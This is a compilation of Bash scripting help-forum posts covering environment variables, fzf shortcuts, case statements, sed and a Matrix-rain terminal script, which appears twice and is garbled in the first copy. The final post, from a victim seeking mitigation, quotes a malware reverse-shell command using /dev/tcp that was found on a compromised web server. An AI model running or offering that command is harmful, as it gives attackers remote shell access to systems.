I got weriod ENV setting.
RHEL 7.9
When I create new user, the new user always has a env setting DM_HOME.
I checked the /etc/skel/.bashrc, and other files, DM_HOME is not set there.
Where can I find the setting of the env DM_HOME?
Thanks a lot.
BTW, all the existing users have this env when login.
Trying to create shortcut key, combined with fzf.
My intention is to create a shortcut key for bash, when pressed it gives you a list of recently visited directories to chose from, and upon choosing the selected directory the selected directory will be appended to the current cursor point.
I have this achieve almost half way using z command and fzf
z | awk "{print \$2}" | fzf
I'm happy with what this is giving me, but want to initiate this fuzzy search of recently visited directory anytime when I'm typing a command.
Say I have typed cd on my prompt, then initiate the above feature to chose from the list, then chosen option to be appended after the existing cd command.
Can someone shed some lights?
How to parse a SQL file with a BASH script ?
I need a script that will parse a SQL query that contains name and URL that he will then cURL and execute.
Defining a function
Guys can someone please tell me what is the difference between
function main{
HELP! Unable to run gcloud on git bash.
I have installed gcloud on my windows system, and its not recognizing the gcloud command somehow.
Its working fine when I am using powershell or CMD. What might be the issue.
One possible reason was the python or node version, but both are corrert
Piped if-condition always returns true, how to fix?
This code uses a pipe in an if statement condition. Somehow, the condition always is true, even when grep
doesn't find anything (aka returning 1).
Is this because the first command always returns 0? If so, how can I make sure that the condition is only considered true
when all commands in the pipe return 0?
if VBoxManage list hdds | grep --quiet "$VM_NAME"; then
echo "VDI exsists"
echo "VDI does not exsist
if [ $i -eq 0 ]; then
color=$white_bold # First character in the trail is white and bold
if [ $last_pos -ne $trail_pos ]; then
printf "%b" "\033[${trail_pos};${c}H" # Move cursor to the right position
printf "%b" "${color}${trail:$i:1}\033[0m" # Print the character with color
positions[$c]=$((pos + 1)) # Update the position for the next cycle
if [ $pos -ge $((ROWS + ${#fade_colors[@]})) ]; then
positions[$c]=0 # Reset position if it moves off screen
# Main loop for continuous execution of the update_line function
while true; do
# Reset terminal settings on exit (show cursor, clear screen, reset text format)
echo -ne '\033[?25h' # Show cursor
tput sgr0 # Reset text format
Looking for assistance - Modifying Matrix code rain
I was wondering if anyone could help me figure this out.
Found this authored by derrick.blarg Matrix Reimagined: Crafting Digital Rain with Bash and ChatGPT – Derrick.Blarg
Check out the article to find a preview.
I'd like to modify this a bit. In essence, I'd like to only loop it twice. That said, on the second loop in the center of the console, spell out a defined string variable with the rain as the loop is ending.
# This script creates a Matrix-style falling text effect in the terminal.
# Define strings for extra characters (Japanese Katakana) and extended ASCII characters
# Define arrays of color codes for a fading green color effect, and a static color
fadecolors=('\033[38;2;0;255;0m' '\033[38;2;0;192;0m' '\033[38;2;0;128;0m' '\033[38;2;0;64;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;16;0m' '\033[38;2;0;8;0m') # Fading green colors
staticcolor='\03338;2;0;0;0m' # Static dark green color
white_bold='\033[1;37m' # White and bold for the primary character
# Get terminal dimensions
COLUMNS=$(tput cols) # Number of columns in the terminal
ROWS=$(tput lines) # Number of rows in the terminal
# Hide the cursor for a cleaner effect and clear the screen
echo -ne '\033[?25l'
# Function to generate a random character from the set of extra characters and extended ASCII
random_char() {
local chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789${extra_chars}${extended_ascii}"
echo -n "${chars:RANDOM%${#chars}:1}"
# Generate a list of 1000 random characters
for (( i=0; i<1000; i++ )); do
random_chars+=$(random_char) # Add a random character to the end of the string
# Initialize a counter for cycling through the random characters
char_counter=0 # Counter for cycling through the random characters
# Initialize arrays to keep track of the position and trail characters of each column
positions=() # Array to store the current position in each column
trail_chars=() # Array to store the trail characters in each column
for (( c=1; c<=COLUMNS; c++ )); do
positions[$c=$((RANDOM % ROWS)) # Random starting position for each column
trailchars[$c]="" # Start with an empty trail for each column
# Function to update the display with the falling text effect
updateline() {
local lastpos=0 # Track the last position to optimize cursor movement
for (( c=1; c<=COLUMNS; c++ )); do
# Randomly skip updating some columns to create a dynamic effect
if [ $((RANDOM % 4)) -ne 0 ]; then
local newchar=${randomchars:$charcounter:1} # Select the next character from the random string
charcounter=$(( (charcounter + 1) % 1000 )) # Update the counter, cycling back after 1000
local pos=${positions$c} # Current position in this column
local trail=${trailchars[$c]} # Current trail of characters in this column
trailchars$c="${newchar}${trail:0:$((ROWS - 1))}" # Update the trail by adding new character at the top
# Render the trail of characters
for (( i=0; i<${#trail}; i++ )); do
local trailpos=$((pos - i)) # Calculate the position for each character in the trail
if $trail_pos -ge 0 && $trail_pos -lt $ROWS ; then
local color=${fadecolors[i]:-$staticcolor} # Choose color from the fade array or static color if beyond the
Daugter job$ whatis 'daughter job'
daughter job: nothing appropriate.
For a job interview, how would you present a bunch of API cURL commands to oAuth and server endpoints?
Like you have tasks that involve making cURL commands to oAuth and Server endpoints to obtain tokens and do stuff on the API endpoints. In the interview, you guys will present how and what you did. So how would you present this to them. I am thinking docker or Github private.
Linux open-source book, Like DevOps
My book about command shell, utils, tips, fast work with awesome programs.
Regards: Microsoft, Canonical, Alphabet
Random number generator issue
I am currently trying to code a number generator that generates a number between 1 and 7 every 10 seconds.
Here is my code:
while true; do
random_number=$(( (RANDOM % 7) + 1 ))
echo "Random number between 1 and 7: $random_number"
sleep 10
However when i run the code it always just gives me a result of 1. Am I doing something wrong?
Recursive script with pattern matching issues
I am trying to write a script to parse a file, This file contains the following (only a snippet for exmaple)
define service{
name win-ns-check-login-decom-service ; The 'name' of this service template
service_description Windows Login State for Decom Pending
servicegroups windows-ns-service-group
use generic-info-service
hostgroup_name decom-windows-servers,!win-ns-check-login-no-restart
check_command check_ns_args!check_login!"-_Reload 1"
define service{
name win-ns-check-login-no-restart-service ; The 'name' of this service template
service_description Windows Login State wo Restart
servicegroups windows-ns-service-group
use generic-service
hostgroup_name win-ns-check-login-no-restart
notification_interval 0 ; Only send notifications on status change by default.
notification_options c,r
check_command check_ns_args!check_login!"-_Reload 0"
define service{
name win-ns-check-activation-service ; The 'name' of this service template
service_description Windows Activation State
servicegroups windows-ns-service-group
use generic-p2-service
hostgroup_name windows-nsclient-servers,win-ns-check-activation,!win-ns-check-login-no-restart,!win-ns-check-login,!exclude-win-check-activate
notification_interval 0 ; Only send notifications on status change by default.
notification_options c,r
check_command check_ns_args!check_login!"-_DoLogin 0"
I am trying to recursively go through this file with over hundreds of entries and map all of these fields in CSV format, The script I have is as such:
echo "Command_Name,Check_Command,Service_Group,Service_Description,Use,Hostgroup_Name"
for s in "`cat /etc/icinga/objects/services/* | grep -v "#" | sed -n '/{/,/}/{p;/}/q}'`"
cn=`echo "$s" | grep "\^name" | awk '{print $2}'`
use=`echo "$s" | grep "use" | awk '{print $2}'`
sg=`echo "$s" | grep servicegroups | awk '{print $2}'`
sd=`echo "$s" | grep service_description | awk '{print $2" " $3" "$4" "$5" "$6}'`
hgn=`echo "$s" | grep hostroup_name | sed 's/ hostgroup_name //g'`
ccom=`echo "$s" | grep check_command | sed 's/ check_command //g'`
echo "$cn,$ccom,$sg,$sd,$use,$hgn"
I have tried looking on various forums for awk and sed commands that can recursively go through the file, I am trying to extract the chunks between the "{" and "}" and treat them as their own "object" to grep through and extract the values, however, all I can do is either get the first data chunk OR get between the first { and the last }.... so effectively I get everything in one big chunk. any ideas here? grep -A and -B will not work because those are absolute values for n number of lines and not all entries are formatted the same and may result in cross-contamination from other entries.
the end result should output something like the following:
win-ns-check-login-decom-service,check_ns_args!check_login!"-_Reload 1",windows-ns-service-group,Windows Login State for Decom Pending,generic-info-service,decom-windows-servers,!win-ns-check-login-no-restart
win-ns-check-login-no-restart-service,check_ns_args!check_login!"-_Reload 0",windows-ns-service-group,Windows Login State wo Restart,generic-service,win-ns-check-login-no-restart
win-ns-check-activation-service,check_ns_args!check_login!"-_DoLogin 0",windows-ns-service-group,Windows Activation State,generic-service,check_ns_args!check_login!"-_DoLogin
The script doesn't ask for my input if I want to proceed (if the -i flag is added in the terminal) and just goes on#!/bin/bash
askconfirmation() {
if [ "$confirm" = true ]; then
echo "Do you want to procede? [y/n]: "
read choice
case "$choice" in
[Yy]*) return 0 ;;
*) return 1 ;;
copyfile() {
for file in "$src"/*; do
name_file=$(basename "$file")
if [ ! -e "$dest"/"$name_file" ]; then
if askconfirmation; then
cp "$file" "$dest"/"$name_file"
echo "Copying: "$file" -> "$dest"/"$name_file""
while getopts ":i" opt; do
case $opt in
i) confirm=true ;;
\?) echo "Option not valid" >&2 && exit 1 ;;
shift $((OPTIND -1))
A Bash script that adds custom colors to languages in Nano
This bash script works on Debian-based OSs and adds color scripts to your user's $HOME.
Just execute the script, open Nano with a shell script or whatever language was included, and see the results yourself.
You can find the GitHub script here.
Cheers guys.
What does ;;& in switch case ?
Hello everyone !
I'm pretty new to Bash, I began last week. I'm working on the switch case statement, and on the GNU doc (https://www.gnu.org/software/bash/bash/manual/bash.pdf) on the page 13 of the document (with their count), they talk about the ;;& but I don't understand well what does it do.
Can someone explain it to me please ?
Thank you in advance for your answers.
Help with scripts run as sudo
i have two scripts as below, and i usually call the parent one from the terminal.parent.sh
# $SCRIPTDIR defined here
sudo env PATH="$PATH" "$SCRIPTDIR"/child.sh
# other functions to call herechild.sh
zypper dup -y
flatpak update -y &
# vencord is in "$HOME"/.local/bin, which is specified in my user's $PATH env var
yes | vencord -install -branch auto &
what i would like to do are:
1 - when i run the parent script with -x
option, the child one should enable that option as well.
2 - currently when i run the parent script, only zypper
would print out to stdin. flatpak
and vencord
should print out to the terminal too.
what modifications should i make to the scripts above? many thanks.
Case statement
Does anyone know how to read blank values in case statement. For example
Echo "please enter a number"
Read number
Case $number in
1 ) echo "number is 1" ;;
2 ) echo "number is 2" ;;
*) echo "please enter a number" ;;
What if the user does not input anything.
How do I read that
Share Your Craft.
I want to upgrade my bash scripting game. Would highly appreciate if you share what kind of script to you write for day to day task. So far I am using two script to open bunch of file, one for coding related programes, other one for chilling and gaming programe. I have another to download random wallpaper from the internet. What else I should do?
Patchwork reminder app for bash
The last couple of weeks I refined a super-simple bash script starting from a nice `at` example usage.
I wrote more about it here https://blog.carlolobrano.com/posts/2024-04-07-patchwork-reminder-app-bash/
Which characters (keys) are mostly used for bash language?
Looking to buy a new keyboard, so I would like to know if US international layout would be more useful than my primary language.
Looking for assistance - Modifying Matrix code rain
I was wondering if anyone could help me figure this out.
Found this authored by derrick.blarg [Matrix Reimagined: Crafting Digital Rain with Bash and ChatGPT – Derrick.Blarg](https://derrick.blog/2023/12/29/matrix-reimagined-crafting-digital-rain-with-bash-and-chatgpt/)
Check out the article to find a preview.
I'd like to modify this a bit. In essence, I'd like to only loop it twice. That said, on the second loop in the center of the console, spell out a defined string variable with the rain as the loop is ending.
# This script creates a Matrix-style falling text effect in the terminal.
# Define strings for extra characters (Japanese Katakana) and extended ASCII characters
# Define arrays of color codes for a fading green color effect, and a static color
fade_colors=('\033[38;2;0;255;0m' '\033[38;2;0;192;0m' '\033[38;2;0;128;0m' '\033[38;2;0;64;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;32;0m' '\033[38;2;0;16;0m' '\033[38;2;0;8;0m') # Fading green colors
static_color='\033[38;2;0;0;0m' # Static dark green color
white_bold='\033[1;37m' # White and bold for the primary character
# Get terminal dimensions
COLUMNS=$(tput cols) # Number of columns in the terminal
ROWS=$(tput lines) # Number of rows in the terminal
# Hide the cursor for a cleaner effect and clear the screen
echo -ne '\033[?25l'
# Function to generate a random character from the set of extra characters and extended ASCII
random_char() {
local chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789${extra_chars}${extended_ascii}"
echo -n "${chars:RANDOM%${#chars}:1}"
# Generate a list of 1000 random characters
for (( i=0; i<1000; i++ )); do
random_chars+=$(random_char) # Add a random character to the end of the string
# Initialize a counter for cycling through the random characters
char_counter=0 # Counter for cycling through the random characters
# Initialize arrays to keep track of the position and trail characters of each column
positions=() # Array to store the current position in each column
trail_chars=() # Array to store the trail characters in each column
for (( c=1; c<=COLUMNS; c++ )); do
positions[$c]=$((RANDOM % ROWS)) # Random starting position for each column
trail_chars[$c]="" # Start with an empty trail for each column
# Function to update the display with the falling text effect
update_line() {
local last_pos=0 # Track the last position to optimize cursor movement
for (( c=1; c<=COLUMNS; c++ )); do
# Randomly skip updating some columns to create a dynamic effect
if [ $((RANDOM % 4)) -ne 0 ]; then
local new_char=${random_chars:$char_counter:1} # Select the next character from the random string
char_counter=$(( (char_counter + 1) % 1000 )) # Update the counter, cycling back after 1000
local pos=${positions[$c]} # Current position in this column
local trail=${trail_chars[$c]} # Current trail of characters in this column
trail_chars[$c]="${new_char}${trail:0:$((ROWS - 1))}" # Update the trail by adding new character at the top
# Render the trail of characters
for (( i=0; i<${#trail}; i++ )); do
local trail_pos=$((pos - i)) # Calculate the position for each character in the trail
if [ $trail_pos -ge 0 ] && [ $trail_pos -lt $ROWS ]; then
local color=${fade_colors[i]:-$static_color} # Choose color from the fade array or static color if beyond the
Intercepting key presses and passing them to a background process
If anyone could assist with this shell script I'd appreciate it.
The idea is that `mplayer` is running in the background so that I can detect an "s" key press (to save the current path to file), but in all other cases I want to pass the keyboard input to `mplayer` so that I can still use its controls.
Is this possible? Or is there another approach? I have not been able to solve this ssist with this shell script I'd appreciate it.
`for audio_file in "${playlist[@]}"; do`
`mplayer -really-quiet "$audio_file" &`
`while true; do`
`read -n 1 -t 1 -s key`
`if [ "$key" != "s" ]; then`
`# pass the key press to \`mplayer\` here`
`echo "$audio_file" >> favorites.txt`
Environmental Madness
Making my first ever special little directory for my future Bash-growth-and-development, writing them scripts like a grown-up, my own beautiful bins, feeling so worldly. This little exchange with the shell amused me more than it should, and so I thought it might be amusing to the fine Bash-humans of Bash-world.
Luckily I had just echo'd $PATH moments before, so a quick kill-yank and the day was saved. There was an instance where I thought: "what, where's my stuff, noooooo". What would I have done, if I'd clobbered it? Dust off grep and go hunting for binary hotspots?
Anyway, it was a minute of my day, but good times were had.
Wishing you all the best in your day.
In array jobs, how to use argument from $id, such as python.py $id0, $id1 and py.py ../folder/+$id1?
for example, my python file is like
python3 file.py arg1 'arg2'
I code this command in one script using array jobs, like
#SBATCH -J array-job
#SBATCH -a 1-4
id=head -n $SLURM_ARRAY_TASK_ID $id_list | tail -n 1
in which, PARA_LIST.txt is like
arg1-1, arg2-1
arg1-2, arg2-2
arg1-3, arg2-3
arg1-4, arg2-4
so, each $id
is string, $id[0]
and %id[1]
are also string. But arg1
in file.py is not string. How to implement the following script?
#SBATCH -J array-job
#SBATCH -a 1-4
id=head -n $SLURM_ARRAY_TASK_ID $id_list | tail -n 1
cd ../folder + $id1
python3 file.py $id0 $id1
Thanks in advance!
Any assistance or a nudge in the right direction will be greatly appreciated.
How does this sed command work?
The command is used to remove all empty lines left at the end of the file. I hope it's alright to ask about sed here, this command is really tricky.sed -i -e :a -e '/^\n*$/{$d;N;ba' -e '}' file.txt
What this command do?
I had to deal with some malware on a web server (php, magento, wordpress).
One of the things that are interesting (to me) is this process:sh -c /bin/sh -i >& /dev/tcp/XXX.XXX.XXX.XXX/587 0>&1
xxx.xxx.xxx.xxx is the IP address
Can anyone explain what this do exactly, and if there's a chance to mitigate if not completely prevent from happening.
Unfortunately I have only one user available for both ssh and web server so I can't do anything with permissions.